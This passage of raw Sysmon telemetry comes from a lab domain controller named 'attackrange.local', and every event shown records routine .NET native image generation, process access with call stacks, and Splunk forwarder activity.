Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.251{08A6967A-45C8-6000-BB02-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000006908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:25.922{08A6967A-45C4-6000-B602-000000009A01}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\8d0-0\System.Web.dll2021-01-14 13:23:25.922 10341000x80000000000000006925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.782{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45CE-6000-C002-000000009A01}1272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.782{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45CE-6000-C002-000000009A01}1272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.782{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45CE-6000-C002-000000009A01}1272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:26.719{08A6967A-45CE-6000-BF02-000000009A01}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10c8-0\System.Web.ApplicationServices.dll2021-01-14 13:23:26.719 10341000x80000000000000006921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.657{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45CE-6000-BF02-000000009A01}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.641{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45CE-6000-BF02-000000009A01}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.641{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45CE-6000-BF02-000000009A01}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.610{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45CE-6000-BE02-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.594{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45CE-6000-BE02-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.594{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45CE-6000-BE02-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:26.547{08A6967A-45CE-6000-BD02-000000009A01}4380C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\111c-0\System.Web.Abstractions.dll2021-01-14 13:23:26.547 10341000x80000000000000006914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.516{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45CE-6000-BD02-000000009A01}4380C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.516{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45CE-6000-BD02-000000009A01}4380C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.516{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45CE-6000-BD02-000000009A01}4380C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.344{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45CE-6000-BC02-000000009A01}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.329{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45CE-6000-BC02-000000009A01}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:26.329{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45CE-6000-BC02-000000009A01}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:27.000{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45CF-6000-C102-000000009A01}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:27.000{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45CF-6000-C102-000000009A01}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:27.000{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45CF-6000-C102-000000009A01}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:30.829{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D2-6000-C402-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:30.829{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45D2-6000-C402-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:30.829{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D2-6000-C402-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:30.766{08A6967A-45D2-6000-C302-000000009A01}3976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f88-0\System.Web.DataVisualization.Design.dll2021-01-14 13:23:30.766 10341000x80000000000000006935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:30.454{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D2-6000-C302-000000009A01}3976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:30.438{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45D2-6000-C302-000000009A01}3976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 